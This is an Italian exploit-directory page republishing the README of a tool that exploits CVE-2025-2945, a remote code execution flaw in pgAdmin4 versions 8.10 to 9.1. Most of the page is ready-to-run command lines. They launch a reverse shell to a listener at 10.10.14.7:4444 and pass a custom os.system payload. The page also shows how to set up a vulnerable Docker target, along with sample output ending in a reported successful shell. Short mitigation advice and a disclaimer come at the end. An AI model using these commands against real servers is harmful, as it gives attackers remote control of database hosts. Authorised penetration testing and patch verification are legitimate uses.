Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-2945 — Exploit per la vulnerabilità di esecuzione remota di codice (RCE) in pgAdmin4 che interessa le versioni dalla 8.10 alla 9.1. | Kitploit
Strumenti/GitHubGitHub/g0d150ne/cve-2025-2945
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubg0d150ne/cve-2025-2945

CVE-2025-2945

Exploit per la vulnerabilità di esecuzione remota di codice (RCE) in pgAdmin4 che interessa le versioni dalla 8.10 alla 9.1.

Vedi Repository
9 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-2945 - Exploit RCE autenticato in pgAdmin4

Autore: G0D150NE
Versione: 2.0.0
CVE: CVE-2025-2945
Gravità: Critica (CVSS 9.9)

📌 Descrizione

Exploit per la vulnerabilità di Remote Code Execution (RCE) in pgAdmin4 che interessa le versioni dalla 8.10 alla 9.1.

La vulnerabilità è presente nell'endpoint /sqleditor/query_tool/download, dove il parametro query_commited viene passato senza sanitizzazione alla funzione eval() di Python, consentendo l'esecuzione di codice arbitrario.

⚡ Funzionalità

  • ✅ Rilevamento automatico della versione
  • ✅ Raccolta del token CSRF da più fonti
  • ✅ Enumerazione degli ID server/gruppo
  • ✅ Payload di reverse shell (codificato in base64)
  • ✅ Supporto payload personalizzati
  • ✅ Modalità debug verbosa
  • ✅ Output console colorato
  • ✅ Bypass della verifica SSL

🚀 Installazione

root@kitploit:~
# Clona o scarica lo script
git clone https://github.com/g0d150ne/CVE-2025-2945
cd CVE-2025-2945

# Installa le dipendenze
pip install requests

🎯 Utilizzo

Utilizzo di base

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

Con output verboso

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  -v

Payload personalizzato

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --custom-payload "__import__('os').system('whoami > /tmp/test.txt')"

Salta il controllo della versione

root@kitploit:~
python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --skip-version-check

📊 Argomenti

Argomento Obbligatorio Descrizione --target-url Sì URL di base di pgAdmin4 (http://RHOST:PORT/) --username Sì Email di accesso a pgAdmin4 --password Sì Password di accesso a pgAdmin4 --db-user Sì Nome utente del database --db-pass Sì Password del database --db-name Sì Nome del database --Rhost Sì IP del listener per la reverse shell --Rport Sì Porta del listener per la reverse shell --max-server-id No ID server massimo da scansionare (default: 10) --skip-version-check No Salta la verifica della versione --custom-payload No Payload Python personalizzato --verbose, -v No Abilita l'output di debug --no-banner No Nascondi il banner

📋 Requisiti

· Python 3.6+ · libreria requests

root@kitploit:~
pip install requests

🧪 Ambiente di test

root@kitploit:~
# Docker con versione vulnerabile di pgAdmin
docker run -d -p 5050:5050 \
  -e [email protected] \
  -e PGADMIN_DEFAULT_PASSWORD=admin123 \
  dpage/pgadmin4:8.10

# Poi esegui l'exploit
python3 poc.py \
  --target-url http://localhost:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

🖥️ Esempio di output

root@kitploit:~
   ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ 
  ▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌          
  ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌          
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░▌          
   ▀▀▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌▐░▌          
            ▐░▌▐░▌       ▐░▌▐░▌       ▐░▌          ▐░▌▐░▌          
   ▄▄▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄█░▌ ▄▄▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
   ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀ 
   
   CVE-2025-2945 - pgAdmin4 Authenticated RCE
   Author: G0D150NE
   Version: 2.0.0

[*] Target running vulnerable version 8.10
[*] Authenticating as [email protected]...
[+] Authentication successful
[*] Scanning for valid server (SGID: 7, max: 10)...
[+] Found valid server (SGID: 7, SID: 1)
[*] Initializing SQL editor (trans_id: 4827193)...
[+] SQL editor initialized
[*] Reverse shell payload to 10.10.14.7:4444
[*] Sending payload...
[+] Payload delivered (HTTP 500)
[*] Check listener at your endpoint
[+] Exploit successful!
[*] Check reverse shell on 10.10.14.7:4444

🛡️ Mitigazione

· Aggiorna pgAdmin4 alla versione 9.2 o superiore · Limita l'accesso all'interfaccia di pgAdmin · Utilizza credenziali forti · Abilita MFA se disponibile

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi educativi. L'utilizzo su sistemi senza autorizzazione esplicita è illegale. L'autore non si assume alcuna responsabilità per un uso improprio.

🔗 Riferimenti

· CVE-2025-2945 · Avviso di sicurezza pgAdmin

📄 Licenza

Licenza MIT

Scarica lo strumento